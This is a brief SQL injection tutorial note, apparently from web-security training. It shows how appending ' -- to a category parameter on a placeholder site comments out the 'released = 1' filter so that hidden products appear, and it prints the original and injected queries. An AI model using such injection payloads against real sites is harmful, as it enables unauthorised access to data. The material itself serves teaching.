Retrieving Hidden Data
Target URL: https://insecure-website.com/products?category=Gifts (opens in a new tab)
SELECT * FROM products WHERE category = 'Gifts' AND released = 1Exploit URL: https://insecure-website.com/products?category=Gifts (opens in a new tab)' --
SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1- -- is a comment indicator in SQL
In Result, all produces are displayed -> including unreleased products